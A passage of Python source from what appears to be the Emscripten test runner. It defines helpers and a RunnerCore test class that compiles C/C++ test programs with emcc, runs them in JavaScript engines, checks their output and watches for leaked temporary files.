return skip_if(f, 'is_wasm', note, negate=True)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
]
if shared.Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if shared.Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
resulting_test.__name__ = '%s_%s' % (name, suffix)
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.save_dir = EMTEST_SAVE_DIR
self.env = {}
self.temp_files_before_run = []
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
Building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
Building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
Building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [PYTHON, EMCC] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
Building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = [filename] + additional_files + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, EMCC] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.split('\n'), y.split('\n'),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % limit_size(values[0]), limit_size(y))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
void bfunc();
void cfunc();
int _main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
self.emcc_args += ['--embed-file', '.@/']
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int _main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currenlty working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "_Z5bfuncv");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "_Z5cfuncv");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines and not self.is_wasm_backend():
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
js_engines += wasm_engines
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
